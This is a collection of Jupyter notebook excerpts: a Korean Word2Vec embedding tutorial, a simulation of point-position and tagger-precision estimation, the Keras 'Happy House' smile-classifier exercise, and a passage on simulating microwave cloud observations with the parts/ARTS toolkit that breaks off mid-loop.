plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
plt.clf() # 그림을 초기화합니다
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
```
#### Word2Vec
이전 스텝에서 라벨링 비용이 많이 드는 머신러닝 기반 감성분석의 비용을 절감하면서 정확도를 크게 향상시킬 수 있는 자연어처리 기법으로 단어의 특성을 저차원 벡터값으로 표현할 수 있는 워드 임베딩(word embedding) 기법이 있다는 언급을 한 바 있습니다.
우리는 이미 이전 스텝에서 워드 임베딩을 사용했습니다. 사용했던 model의 첫 번째 레이어는 바로 Embedding 레이어였습니다. 이 레이어는 우리가 가진 사전의 단어 개수 X 워드 벡터 사이즈만큼의 크기를 가진 학습 파라미터였습니다. 만약 우리의 감성분류 모델이 학습이 잘 되었다면, Embedding 레이어에 학습된 우리의 워드 벡터들도 의미 공간상에 유의미한 형태로 학습되었을 것입니다. 한번 확인해 봅시다.
## Embedding layer analysis
```
import os
import gensim
# genism = opensource library for the unsupervised learning and NLP
from gensim.models.keyedvectors import Word2VecKeyedVectors
from tensorflow.keras.initializers import Constant
embedding_layer = model.layers[0]
weights = embedding_layer.get_weights()[0]
print(weights.shape)
word2vec_file_path = os.getenv('HOME')+'/aiffel/EXP_07_sentiment_classification/word2vec.txt'
f = open(word2vec_file_path, 'w')
f.write('{} {}\n'.format(vocab_size-4, word_vector_dim))
vectors = model.get_weights()[0]
for i in range(4,vocab_size):
f.write('{} {}\n'.format(index_to_word[i], ' '.join(map(str, list(vectors[i, :])))))
f.close()
```
- 학습한 embedding parameter를 파일에 적어서 저장
- for문을 이용하여, 특수 문자를 제외한 단어 갯수 만큼의 워드 벡터를 파일에 기록
```
word_vectors = Word2VecKeyedVectors.load_word2vec_format(word2vec_file_path, binary=False)
word_vectors.similar_by_word("사랑")
```
- 파일에 기록된 embedding parameter를 이용하여, word vector로 활용
- 주어진 단어를 기준으로 유사한 단어, 유사도를 출력
- '사랑'이라는 단어를 기준으로 유사도를 확인해본 결과, 연관성이 없다고 봐도 무방할 정도의 단어들이 출력
- 해당 단어들의 유사도는 0.85 이상으로, 꽤 높은 유사도를 보여주고 있음
- 실제 유사한 단어가 아님에도 높은 유사도를 보이는 것은, 주어진 단어가 한글이기 때문에 gensim이 잘 작동하지 않는다고 판단됨
### 한국어 Word2Vec 임베딩 활용하여 성능개선
한국어 Word2Vec은 다음 경로에서 구할 수 있습니다.
- Pre-trained word vectors of 30+ languages (https://github.com/Kyubyong/wordvectors)
```
embedding_layer = model.layers[0]
weights = embedding_layer.get_weights()[0]
print(weights.shape) # shape: (vocab_size, embedding_dim)
import os
# 학습한 Embedding 파라미터를 파일에 써서 저장합니다.
word2vec_file_path = os.getenv('HOME')+'/aiffel/sentiment_classification/data/word2vec.txt'
f = open(word2vec_file_path, 'w')
f.write('{} {}\n'.format(vocab_size-4, word_vector_dim)) # 몇개의 벡터를 얼마 사이즈로 기재할지 타이틀을 씁니다.
# 단어 개수(에서 특수문자 4개는 제외하고)만큼의 워드 벡터를 파일에 기록합니다.
vectors = model.get_weights()[0]
for i in range(4,vocab_size):
f.write('{} {}\n'.format(index_to_word[i], ' '.join(map(str, list(vectors[i, :])))))
f.close()
from gensim.models.keyedvectors import Word2VecKeyedVectors
word_vectors = Word2VecKeyedVectors.load_word2vec_format(word2vec_file_path, binary=False)
vector = word_vectors['사랑']
vector
word_vectors.similar_by_word("재밌")
# 유사도를 분석!
from gensim.models import KeyedVectors
word2vec_path = os.getenv('HOME')+'/aiffel/EXP_07_sentiment_classification/word2vec/ko.tar.gz'
word2vec = KeyedVectors.load_word2vec_format(word2vec_path, binary=True, limit=1000000)
vector = word2vec['영화']
vector # 무려 300dim의 워드 벡터입니다.
```
| github_jupyter |
# Gather statistics about iterative point position & tagger precision estimation procedue
Perform $N_e$ experiments, in which data is simulated and used for the estimation procedure:
Simulate points $x_j$, tags $x_{ji} \sim N(x_j,\sigma_i^2)$ for N points ($j=1,...,N$) and $N_t$ taggers ($i=1,...,N_t$).
Peform the estimation procedure, and gather data after convergence:
1. The MSE for the estimation of $x_j$ (using the estimated sigmas, the real sigmas, and an equal-weight average)
2. The MSE for the estimation of $\sigma_i$
Gather data for different $N_t$, $\beta$.
```
import numpy as np
from numpy import linalg as LA
import matplotlib.pyplot as plt
import scipy
```
### Define functions that 1. Simulate the data 2. Run the estimation procedure
```
def simulate_data(N,Nt):
''' Simulate ground truth points, tagger properties, and tags
Args:
N (int): The number of ground truth points to simulate
Nt (ind): The number of taggers
Returns:
gt_pos: a (N,2) np.array with ground truth positions in 2D
sigma_sq: a length Nt np.array containing sigma**2 of tagger i in index i
clusters: length N array. clusters[i][0]: a list of taggers that tagged the i-th gt point,
clusters[i][1]: the tags generated for the i-th gt point
'''
L = 100 # gt points will be in [0,L]x[0,L]
# properties of taggers
# draw the values of the pi's from a uniform distribution in [0,1]
p = np.random.uniform(low=1, high=1, size=(Nt)) #p[i] is the detection probability of tagger i
sigma_sq = np.random.uniform(low=0.5, high=3, size=(Nt))**2 # sigma_sq[i] is the var of position tagged by tagger i
# draw ground truth position uniformly in [0,L] x [0,L]
gt_pos = np.random.uniform(low=0,high=L,size=(N,2))
# simulate tags for each of the clusters
clusters = [None]*N # if there are no tags for gt point k, clusters[k] will remain None
cluster_is_tagged = [False]*N # cluster_is_tagged[k]==True iff there is at least one tag for gt point k
for k in range(N):
is_tagged = [np.random.binomial(n=1,p=p[i]) for i in range(Nt)]
tagged_ind = np.where(is_tagged)[0]
# if no tags exist, don't save this cluster
if any(is_tagged):
#tagged_ind = list(range(Nt))
tags = np.zeros((len(tagged_ind),2))
for j,i in enumerate(tagged_ind): # loop over tags that exist
# draw position from normal distribution
tags[j,:] = np.random.multivariate_normal(mean=gt_pos[k,:],cov=sigma_sq[i]*np.identity(2))
clusters[k] = (tagged_ind, tags)
cluster_is_tagged[k] = True
# only worked with tagged points - through away the untagged ones
Neffective = sum(cluster_is_tagged) # the number of tagged gt points
if Neffective<N:
gt_pos = gt_pos[cluster_is_tagged,:]
clusters = np.array(clusters)
clusters = clusters[cluster_is_tagged]
return sigma_sq, gt_pos, clusters
# given sigma_sq_est, estimate the gt position
def update_pos(clusters, sigma_sq_est, N, beta=0):
# beta = regularization parameter to prevent weight divergence to infinity
gt_pos_est = np.zeros((N,2))
for k in range(N): # loop over clusters
tagged_ind, tags = clusters[k]
weights = np.expand_dims(1/(sigma_sq_est[tagged_ind]+beta), axis=-1)
gt_pos_est[k,:] = np.sum(tags*weights,axis=0) / np.sum(weights)
return gt_pos_est
def update_sigma_sq(clusters, gt_pos_est, N, Nt):
# given estimated positions, estimate sigma_sq[i]
# for each cluster, accumulate data for all tags that exist.
# keep count of how many points have from each, then divide
s = np.zeros(Nt) # s[i] = sum over (x-gt)**2 for tagger i (2D since have x,y)
count = np.zeros(Nt) # count[i] = number of data points for tagger i
for k in range(N): # loop over clusters
tagged_ind, tags = clusters[k]
gt_pos_est_k = gt_pos_est[k,:]
shifted_tags = tags - gt_pos_est_k
s[tagged_ind] += np.sum(shifted_tags**2, axis=1)
count[tagged_ind] += 2 # summed samples (each point gives 1 sample for x, 1 for y)
s = s / (count-1) # estimator of sigma squared
# lower bound possible s values:
#s_sq_min = 0.1
#s[s<s_sq_min] = s_sq_min
return s #sigma_sq_est
def estimate_positions_and_sigmas(N,Nt,clusters,beta):
''' Perform iterations to estimate the positions and sigmas.
Args:
clusters: length N array. clusters[i][0]: a list of taggers that tagged the i-th gt point,
clusters[i][1]: the tags generated for the i-th gt point
diff_thresh (float): a threshold for determining convergence
(small number below which can say the algorithm converged)
beta: regulrization parameter
Returns:
gt_pos_est, sigma_sq_est - estimates of gt positions, sigmas
'''
# set estimates to initial values
#p_est = 0.7*np.ones(Nt)
sigma_sq_est = 1*np.ones(Nt)
gt_pos_est = np.zeros((N,2))
diff_thresh = 1e-10
counter = 0
Nsteps_max= 1000 # if no convergence until reached, exit and display message
# perform first step of gt and sigma estimation
gt_pos_est_prev = gt_pos_est # save previous estimate
gt_pos_est = update_pos(clusters, sigma_sq_est, N, beta=beta)
sigma_sq_est = update_sigma_sq(clusters, gt_pos_est, N, Nt)
while LA.norm(gt_pos_est - gt_pos_est_prev)>diff_thresh:
gt_pos_est_prev = gt_pos_est
gt_pos_est = update_pos(clusters, sigma_sq_est, N, beta=beta)
sigma_sq_est = update_sigma_sq(clusters, gt_pos_est, N, Nt)
counter += 1
if counter==Nsteps_max:
print('Exited without converging after ' + str(Nsteps_max) + ' steps.')
break
#print(counter, LA.norm(gt_pos_est - gt_pos_est_prev))
#else:
#print('Converged after ', counter, ' steps.')
return gt_pos_est, sigma_sq_est
```
### Set parameters, initialize variables to collect results
```
#Ns = 1000 # number of repeats for each parameter value
Ns = 30
N = 2000 # number of points simulated in each instance
Nt = 3 # number of taggers
beta_list = np.arange(0,2,0.2)
#beta_list = np.array([0,0.25,0.5,0.75,1])
Nbeta = len(beta_list)
# beta = 1
# sigma_sq, gt_pos, clusters = simulate_data(N,Nt)
# gt_pos_est, sigma_sq_est = estimate_positions_and_sigmas(N,Nt,clusters,beta)
# collect stats
# initialize variables
min_sigma_sq = np.zeros((Ns,Nbeta))
pos_mse = np.zeros((Ns,Nbeta))
sigma_sq_mse = np.zeros((Ns,Nbeta))
pos_mse_real_sigma = np.zeros((Ns))
pos_mse_naive_average = np.zeros((Ns))
import time
t = time.time()
# for each instance of simulated data, perform the estimation with varying beta
for i in range(Ns):
sigma_sq, gt_pos, clusters = simulate_data(N,Nt) # simulate data
for j, beta in enumerate(beta_list):
gt_pos_est, sigma_sq_est = estimate_positions_and_sigmas(N,Nt,clusters,beta) # perform estimation
# collect stats about estimation result
min_sigma_sq[i,j] = min(sigma_sq_est)
SE_pos_est = np.sum((gt_pos_est - gt_pos)**2,axis=1)
pos_mse[i,j] = np.mean(SE_pos_est)
sigma_diff = sigma_sq - sigma_sq_est
sigma_sq_mse[i,j] = np.mean(sigma_diff**2)
# collect stats about instance of simulated data
gt_pos_est_real_s = update_pos(clusters, sigma_sq, N)
SE_real_s_est = np.sum((gt_pos_est_real_s - gt_pos)**2,axis=1)
pos_mse_real_sigma[i] = np.mean(SE_real_s_est)
gt_pos_est_equal_s = update_pos(clusters, np.ones(sigma_sq.shape), N)
SE_equal_s_est = np.sum((gt_pos_est_equal_s - gt_pos)**2,axis=1)
pos_mse_naive_average[i] = np.mean(SE_equal_s_est)
elapsed = time.time() - t
print(elapsed/60)
```
## plot results
```
mean_min_sigma = np.mean(min_sigma_sq, axis=0) # mean over instances, as function of beta
plt.plot(beta_list,mean_min_sigma,'.b')
plt.xlabel('$\\beta$',fontsize=16)
plt.ylabel('$min_i \hat{\sigma}_i$',fontsize=16);
plt.xticks(fontsize=14)
plt.yticks(fontsize=14);
from scipy import stats
mean_pos_mse = np.mean(pos_mse,axis=0) # mean over Ns simulated data instances
mean_pos_mse_real_sigma = np.mean(pos_mse_real_sigma)
mean_pos_mse_naive_average = np.mean(pos_mse_naive_average)
std_pos_mse = np.std(pos_mse,axis=0) # mean over Ns simulated data instances
std_pos_mse_real_sigma = np.std(pos_mse_real_sigma)
std_pos_mse_naive_average = np.std(pos_mse_naive_average)
sem_pos_mse = scipy.stats.sem(pos_mse,axis=0) # mean over Ns simulated data instances
sem_pos_mse_real_sigma = scipy.stats.sem(pos_mse_real_sigma)
sem_pos_mse_naive_average = scipy.stats.sem(pos_mse_naive_average)
plt.figure()
h = [None]*3
h[0], = plt.plot(beta_list,mean_pos_mse,'.--b')
h[1], = plt.plot(beta_list,np.ones(len(beta_list))*mean_pos_mse_real_sigma,'--g')
h[2], = plt.plot(beta_list,np.ones(len(beta_list))*mean_pos_mse_naive_average,'--r')
plt.fill_between(beta_list, mean_pos_mse - sem_pos_mse, mean_pos_mse + sem_pos_mse, color='blue', alpha=0.2)
#plt.errorbar(beta_list,mean_pos_mse,sem_pos_mse)
plt.fill_between(beta_list, np.ones(len(beta_list))*mean_pos_mse_real_sigma - np.ones(len(beta_list))*sem_pos_mse_real_sigma, np.ones(len(beta_list))*mean_pos_mse_real_sigma + np.ones(len(beta_list))*sem_pos_mse_real_sigma, color='green', alpha=0.2)
plt.fill_between(beta_list, np.ones(len(beta_list))*mean_pos_mse_naive_average - np.ones(len(beta_list))*sem_pos_mse_naive_average, np.ones(len(beta_list))*mean_pos_mse_naive_average + np.ones(len(beta_list))*sem_pos_mse_naive_average, color='red', alpha=0.2)
plt.xlabel('$\\beta$',fontsize=16)
plt.ylabel('MSE of $x_j$ estimate',fontsize=16);
plt.xticks(fontsize=14)
plt.yticks(fontsize=14);
plt.legend(h, ('est','real $\sigma_i$','naive'));
mean_sigma_sq_mse = np.mean(sigma_sq_mse, axis=0) # mean over instances, as function of beta
sem_sigma_sq_mse = scipy.stats.sem(sigma_sq_mse, axis=0) # mean over instances, as function of beta
#plt.plot(beta_list,mean_sigma_sq_mse,'.b')
plt.errorbar(beta_list,mean_sigma_sq_mse,sem_sigma_sq_mse,fmt='o')
plt.xlabel('$\\beta$',fontsize=16)
plt.ylabel('$MSE (\hat{\sigma}_i)$',fontsize=16);
plt.xticks(fontsize=14)
plt.yticks(fontsize=14);
```
| github_jupyter |
# Keras tutorial - the Happy House
Welcome to the first assignment of week 2. In this assignment, you will:
1. Learn to use Keras, a high-level neural networks API (programming framework), written in Python and capable of running on top of several lower-level frameworks including TensorFlow and CNTK.
2. See how you can in a couple of hours build a deep learning algorithm.
Why are we using Keras? Keras was developed to enable deep learning engineers to build and experiment with different models very quickly. Just as TensorFlow is a higher-level framework than Python, Keras is an even higher-level framework and provides additional abstractions. Being able to go from idea to result with the least possible delay is key to finding good models. However, Keras is more restrictive than the lower-level frameworks, so there are some very complex models that you can implement in TensorFlow but not (without more difficulty) in Keras. That being said, Keras will work fine for many common models.
In this exercise, you'll work on the "Happy House" problem, which we'll explain below. Let's load the required packages and solve the problem of the Happy House!
```
import numpy as np
import keras
from keras import layers
from keras.layers import Input, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D
from keras.layers import AveragePooling2D, MaxPooling2D, Dropout, GlobalMaxPooling2D, GlobalAveragePooling2D
from keras.models import Model
from keras.preprocessing import image
from keras.utils import layer_utils
from keras.utils.data_utils import get_file
from keras.applications.imagenet_utils import preprocess_input
import pydot
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
from keras.utils import plot_model
from kt_utils import *
import keras.backend as K
K.set_image_data_format('channels_last')
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
%matplotlib inline
```
**Note**: As you can see, we've imported a lot of functions from Keras. You can use them easily just by calling them directly in the notebook. Ex: `X = Input(...)` or `X = ZeroPadding2D(...)`.
## 1 - The Happy House
For your next vacation, you decided to spend a week with five of your friends from school. It is a very convenient house with many things to do nearby. But the most important benefit is that everybody has commited to be happy when they are in the house. So anyone wanting to enter the house must prove their current state of happiness.
<img src="images/happy-house.jpg" style="width:350px;height:270px;">
<caption><center> <u> <font color='purple'> **Figure 1** </u><font color='purple'> : **the Happy House**</center></caption>
As a deep learning expert, to make sure the "Happy" rule is strictly applied, you are going to build an algorithm which that uses pictures from the front door camera to check if the person is happy or not. The door should open only if the person is happy.
You have gathered pictures of your friends and yourself, taken by the front-door camera. The dataset is labbeled.
<img src="images/house-members.png" style="width:550px;height:250px;">
Run the following code to normalize the dataset and learn about its shapes.
```
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
# Normalize image vectors
X_train = X_train_orig/255.
X_test = X_test_orig/255.
# Reshape
Y_train = Y_train_orig.T
Y_test = Y_test_orig.T
print ("number of training examples = " + str(X_train.shape[0]))
print ("number of test examples = " + str(X_test.shape[0]))
print ("X_train shape: " + str(X_train.shape))
print ("Y_train shape: " + str(Y_train.shape))
print ("X_test shape: " + str(X_test.shape))
print ("Y_test shape: " + str(Y_test.shape))
```
**Details of the "Happy" dataset**:
- Images are of shape (64,64,3)
- Training: 600 pictures
- Test: 150 pictures
It is now time to solve the "Happy" Challenge.
## 2 - Building a model in Keras
Keras is very good for rapid prototyping. In just a short time you will be able to build a model that achieves outstanding results.
Here is an example of a model in Keras:
```python
def model(input_shape):
# Define the input placeholder as a tensor with shape input_shape. Think of this as your input image!
X_input = Input(input_shape)
# Zero-Padding: pads the border of X_input with zeroes
X = ZeroPadding2D((3, 3))(X_input)
# CONV -> BN -> RELU Block applied to X
X = Conv2D(32, (7, 7), strides = (1, 1), name = 'conv0')(X)
X = BatchNormalization(axis = 3, name = 'bn0')(X)
X = Activation('relu')(X)
# MAXPOOL
X = MaxPooling2D((2, 2), name='max_pool')(X)
# FLATTEN X (means convert it to a vector) + FULLYCONNECTED
X = Flatten()(X)
X = Dense(1, activation='sigmoid', name='fc')(X)
# Create model. This creates your Keras model instance, you'll use this instance to train/test the model.
model = Model(inputs = X_input, outputs = X, name='HappyModel')
return model
```
Note that Keras uses a different convention with variable names than we've previously used with numpy and TensorFlow. In particular, rather than creating and assigning a new variable on each step of forward propagation such as `X`, `Z1`, `A1`, `Z2`, `A2`, etc. for the computations for the different layers, in Keras code each line above just reassigns `X` to a new value using `X = ...`. In other words, during each step of forward propagation, we are just writing the latest value in the commputation into the same variable `X`. The only exception was `X_input`, which we kept separate and did not overwrite, since we needed it at the end to create the Keras model instance (`model = Model(inputs = X_input, ...)` above).
**Exercise**: Implement a `HappyModel()`. This assignment is more open-ended than most. We suggest that you start by implementing a model using the architecture we suggest, and run through the rest of this assignment using that as your initial model. But after that, come back and take initiative to try out other model architectures. For example, you might take inspiration from the model above, but then vary the network architecture and hyperparameters however you wish. You can also use other functions such as `AveragePooling2D()`, `GlobalMaxPooling2D()`, `Dropout()`.
**Note**: You have to be careful with your data's shapes. Use what you've learned in the videos to make sure your convolutional, pooling and fully-connected layers are adapted to the volumes you're applying it to.
```
# GRADED FUNCTION: HappyModel
def HappyModel(input_shape):
"""
Implementation of the HappyModel.
Arguments:
input_shape -- shape of the images of the dataset
Returns:
model -- a Model() instance in Keras
"""
### START CODE HERE ###
# Feel free to use the suggested outline in the text above to get started, and run through the whole
# exercise (including the later portions of this notebook) once. The come back also try out other
# network architectures as well.
# Define the input placeholder as a tensor with shape input_shape. Think of this as your input image!
X_input = Input(input_shape)
# Zero-Padding: pads the border of X_input with zeroes
X = ZeroPadding2D((3, 3))(X_input)
# CONV -> BN -> RELU Block applied to X
X = Conv2D(32, (7, 7), strides = (1, 1), name = 'conv0')(X)
X = BatchNormalization(axis = 3, name = 'bn0')(X)
X = Activation('relu')(X)
# MAXPOOL
X = MaxPooling2D((2, 2), name='max_pool')(X)
# FLATTEN X (means convert it to a vector) + FULLYCONNECTED
X = Flatten()(X)
X = Dense(1, activation='sigmoid', name='fc')(X)
# Create model. This creates your Keras model instance, you'll use this instance to train/test the model.
model = Model(inputs = X_input, outputs = X, name='HappyModel')
### END CODE HERE ###
return model
```
You have now built a function to describe your model. To train and test this model, there are four steps in Keras:
1. Create the model by calling the function above
2. Compile the model by calling `model.compile(optimizer = "...", loss = "...", metrics = ["accuracy"])`
3. Train the model on train data by calling `model.fit(x = ..., y = ..., epochs = ..., batch_size = ...)`
4. Test the model on test data by calling `model.evaluate(x = ..., y = ...)`
If you want to know more about `model.compile()`, `model.fit()`, `model.evaluate()` and their arguments, refer to the official [Keras documentation](https://keras.io/models/model/).
**Exercise**: Implement step 1, i.e. create the model.
```
### START CODE HERE ### (1 line)
happyModel = HappyModel((64,64,3))
### END CODE HERE ###
```
**Exercise**: Implement step 2, i.e. compile the model to configure the learning process. Choose the 3 arguments of `compile()` wisely. Hint: the Happy Challenge is a binary classification problem.
```
### START CODE HERE ### (1 line)
happyModel.compile(optimizer = "Adam", loss = "binary_crossentropy", metrics = ["accuracy"])
### END CODE HERE ###
```
**Exercise**: Implement step 3, i.e. train the model. Choose the number of epochs and the batch size.
```
### START CODE HERE ### (1 line)
happyModel.fit(x = X_train, y = Y_train, epochs = 40, batch_size = 16)
### END CODE HERE ###
```
Note that if you run `fit()` again, the `model` will continue to train with the parameters it has already learnt instead of reinitializing them.
**Exercise**: Implement step 4, i.e. test/evaluate the model.
```
### START CODE HERE ### (1 line)
preds = happyModel.evaluate(x = X_test, y = Y_test)
### END CODE HERE ###
print()
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
```
If your `happyModel()` function worked, you should have observed much better than random-guessing (50%) accuracy on the train and test sets.
To give you a point of comparison, our model gets around **95% test accuracy in 40 epochs** (and 99% train accuracy) with a mini batch size of 16 and "adam" optimizer. But our model gets decent accuracy after just 2-5 epochs, so if you're comparing different models you can also train a variety of models on just a few epochs and see how they compare.
If you have not yet achieved a very good accuracy (let's say more than 80%), here're some things you can play around with to try to achieve it:
- Try using blocks of CONV->BATCHNORM->RELU such as:
```python
X = Conv2D(32, (3, 3), strides = (1, 1), name = 'conv0')(X)
X = BatchNormalization(axis = 3, name = 'bn0')(X)
X = Activation('relu')(X)
```
until your height and width dimensions are quite low and your number of channels quite large (≈32 for example). You are encoding useful information in a volume with a lot of channels. You can then flatten the volume and use a fully-connected layer.
- You can use MAXPOOL after such blocks. It will help you lower the dimension in height and width.
- Change your optimizer. We find Adam works well.
- If the model is struggling to run and you get memory issues, lower your batch_size (12 is usually a good compromise)
- Run on more epochs, until you see the train accuracy plateauing.
Even if you have achieved a good accuracy, please feel free to keep playing with your model to try to get even better results.
**Note**: If you perform hyperparameter tuning on your model, the test set actually becomes a dev set, and your model might end up overfitting to the test (dev) set. But just for the purpose of this assignment, we won't worry about that here.
## 3 - Conclusion
Congratulations, you have solved the Happy House challenge!
Now, you just need to link this model to the front-door camera of your house. We unfortunately won't go into the details of how to do that here.
<font color='blue'>
**What we would like you to remember from this assignment:**
- Keras is a tool we recommend for rapid prototyping. It allows you to quickly try out different model architectures. Are there any applications of deep learning to your daily life that you'd like to implement using Keras?
- Remember how to code a model in Keras and the four steps leading to the evaluation of your model on the test set. Create->Compile->Fit/Train->Evaluate/Test.
## 4 - Test with your own image (Optional)
Congratulations on finishing this assignment. You can now take a picture of your face and see if you could enter the Happy House. To do that:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the following code
4. Run the code and check if the algorithm is right (0 is unhappy, 1 is happy)!
The training/test sets were quite similar; for example, all the pictures were taken against the same background (since a front door camera is always mounted in the same position). This makes the problem easier, but a model trained on this data may or may not work on your own data. But feel free to give it a try!
```
### START CODE HERE ###
img_path = 'images/my_image.jpg'
### END CODE HERE ###
img = image.load_img(img_path, target_size=(64, 64))
imshow(img)
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
print(happyModel.predict(x))
```
## 5 - Other useful functions in Keras (Optional)
Two other basic features of Keras that you'll find useful are:
- `model.summary()`: prints the details of your layers in a table with the sizes of its inputs/outputs
- `plot_model()`: plots your graph in a nice layout. You can even save it as ".png" using SVG() if you'd like to share it on social media ;). It is saved in "File" then "Open..." in the upper bar of the notebook.
Run the following code.
```
happyModel.summary()
plot_model(happyModel, to_file='HappyModel.png')
SVG(model_to_dot(happyModel).create(prog='dot', format='svg'))
```
| github_jupyter |
## Cloud observations
This notebook simulates microwave and sub-mm observations of idealized clouds in the atmosphere. Its purpose is to illustrate the general radiative properties of clouds observed from space- or airborne remote sensing instruments.
The simulations are performed using the [parts](https://github.com/simonpf/parts) package, which provides a high-level interface to the [Atmospheric Radiative Transfer Simulator (ARTS)](https://www.radiative-transfer.org).
```
from parts.utils.notebook_setup import *
```
## Sensors
Simulations are performed for selected channels from the ICI and MWI passive radiometers.
```
from parts.sensor import MWI, ICI
mwi = MWI(stokes_dimension = 1, channel_indices = [2, 7, 9, 12, 15])
mwi.sensor_line_of_sight = np.array([180.0])
mwi.sensor_position = np.array([500e3])
ici = ICI(stokes_dimension = 1, channel_indices = [1, 3, 5, 8, 10])
ici.sensor_line_of_sight = np.array([180.0])
ici.sensor_position = np.array([500e3])
sensors = [ici, mwi]
```
Optionally, simulations can also be performed for the CloudSat cloud radar.
```
from parts.sensor import CloudSat
cloud_sat = CloudSat(stokes_dimension = 1)
cloud_sat.sensor_line_of_sight = np.array([180.0])
cloud_sat.sensor_position = np.array([500e3])
cloud_sat.range_bins = np.linspace(0, 20e3, 41) # Edges of range bins [m]
# Uncomment to include CloudSat in simulation.
sensors += [cloud_sat]
```
## Atmosphere
The following assumptions are made for the radiative transfer calculations:
- One-dimensional atmosphere
- Observations over ocean
- Background atmosphere consisting of oxygen, nitrogen and water vapor
These assumptions are implemented by the `StandardAtmosphere` preconfigured atmosphere model
provided by `parts`.
```
%load_ext autoreload
%autoreload 2
from parts.models import StandardAtmosphere
atmosphere = StandardAtmosphere()
```
### Atmospheric data
To perform a numeric simulation, in addition to the abstract description of the atmsopheric configuration to be simulated, the specific atmospheric state (i.e. temperature, pressure, and so on) must be known.
For this `parts` provides standard data providers that provide climatological data for typical atmospheric regime.
Here the `Tropical` data provider is used that provides data describing a typical tropical atmosphere.
```
from parts.data.atmosphere import Tropical
z = np.linspace(0, 20e3, 41)
data_provider = Tropical(z = z)
```
To illustrate this we can plot the data defining the atmospheric state that is provided by the data provider.
```
p = data_provider.get_pressure()
t = data_provider.get_temperature()
q = data_provider.get_H2O()
f, axs = plt.subplots(1, 3, figsize = (7, 5))
ax = axs[0]
ax.plot(p / 100, z / 1e3, c = "C0")
ax.set_xscale("log")
ax.set_xlabel("p [hPa]")
ax.set_ylabel("z [km]")
ax.set_ylim([0, 20])
ax.set_title("Pressure")
ax = axs[1]
ax.plot(t, z / 1e3, c = "C1")
ax.set_xlabel("T [K]")
ax.set_ylim([0, 20])
ax.set_title("$Temperature$")
ax = axs[2]
ax.plot(q, z / 1e3, c = "C2")
ax.set_xlabel("q [mol/mol]")
ax.set_ylim([0, 20])
ax.set_title("$H_2O$")
plt.tight_layout()
```
## Clear sky calculations
To determine the effect of clouds in the atmospheric column, we start with calculating clear-sky radiances as reference value. To run the simulation
```
from parts.simulation import ArtsSimulation
simulation = ArtsSimulation(atmosphere = atmosphere,
sensors = sensors,
data_provider = data_provider)
simulation.setup(verbosity = 0)
simulation.run()
```
The results of the simulation can be accessed via the `y` attribute of the sensors used in the simulation. To store the values for lates use, the have to be explicitly copied otherwise they will be overwritten by the next simulation.
```
f_ici = np.copy(ici.f_grid)
y_ici_clear = np.copy(ici.y)
f_mwi = np.copy(mwi.f_grid)
y_mwi_clear = np.copy(mwi.y)
y_cs_clear = np.copy(cloud_sat.y)
z_cs = cloud_sat.range_bins
z_cs = 0.5 * (z_cs[1:] + z_cs[:-1])
```
### Results
Here we simply plot the results from the clear sky simulation.
```
from matplotlib.gridspec import GridSpec
f = plt.figure(figsize = (13, 5))
gs = GridSpec(1, 4)
handles = []
labels = []
#
# Radar
#
ax = plt.subplot(gs[0, 0])
handles += ax.plot(y_cs_clear, z_cs / 1e3, c = "C0")
labels += ["CloudSat, clear"]
ax.set_xlabel("Radar reflectivity [dBz]")
ax.set_ylabel("Altitude [km]")
ax.set_title("Radar signal")
#
# Passive
#
ax = plt.subplot(gs[0, 1:3])
handles += ax.plot(f_mwi / 1e9, y_mwi_clear, c = "C1", marker = "o")
labels += ["MWI, clear"]
handles += ax.plot(f_ici / 1e9, y_ici_clear, c = "C2", marker = "o")
labels += ["ICI, clear"]
ax.set_title("Brightness temperatures")
ax.set_xlabel("Frequency [GHz]")
ax.set_ylabel("$T_B$ [K]")
#
# Legend
#
ax = plt.subplot(gs[0, -1])
ax.legend(handles = handles, labels = labels, loc = "center left")
ax.set_axis_off()
plt.tight_layout()
```
## Adding clouds to the simulation
To additional steps are required to take into account clouds in the simulation:
- Add scattering species to the atmosphere model
- Provide the data describing the specific state of the clouds
```
from parts.scattering.ssdb import shapes
display(shapes)
```
### Scattering species
Since their most important interaction with radiation in the microwave region that we are interested in is through scattering, we clouds are represented in the atmosphere model as **scattering species**.
To define a scattering species, we must specify
- a particle shape
- a particle size distribution (PSD)
### Available shapes
`parts` provides some predefined particle shapes from the [ARTS single scattering database](https://zenodo.org/record/1175573).
```
from parts.scattering.ssdb import shapes
display(shapes)
```
### Particle size distribution
As particle size distribution we will be using the `D14N` PSD, which is a modified gamma distribution parametrized by the **mass density** and a vertical scaling factor or **intercept parameter** $N_0^*$.
#### Liquid
So to define a liquid cloud species we simply create a scattering species with a PSD and the liquid sphere shape.
For liquid clouds it is also necessary to set a temperature minimum for the PSD below which the PSD will be zero. The reason for this is that the scattering properties for the liquid shape are not available at low temperatures.
```
from parts.scattering import ScatteringSpecies
from parts.scattering.psd import D14MN
psd = D14MN(alpha = 2.0, # first shape parameter
beta = 1.0, # second shape parameter
rho = 1000.0) # density [kg/m^3]
psd.t_min = 270.0
i = [s.__repr__() for s in shapes].index("LiquidSphere")
shape = shapes[i] # Liquid sphere
liquid_cloud = ScatteringSpecies("liquid_cloud", psd, shape)
```
To illustrate this we can plot the particle shape and the PSD for different parameter values.
```
import matplotlib.image as mi
import seaborn as sns
#
# Some colors.
#
sns.reset_orig()
cs = [sns.light_palette("navy", 4),
sns.light_palette("firebrick", 4),
sns.light_palette("seagreen", 4)]
#
# Figure setup
#
f = plt.figure(figsize = (12, 5))
gs = GridSpec(1, 4)
# PSD plots.
ax = plt.subplot(gs[0, 0:2])
x = np.logspace(-5, -2, 101)
handles = []
labels = []
for j, n0 in enumerate(np.array([1e6, 1e8, 1e10])):
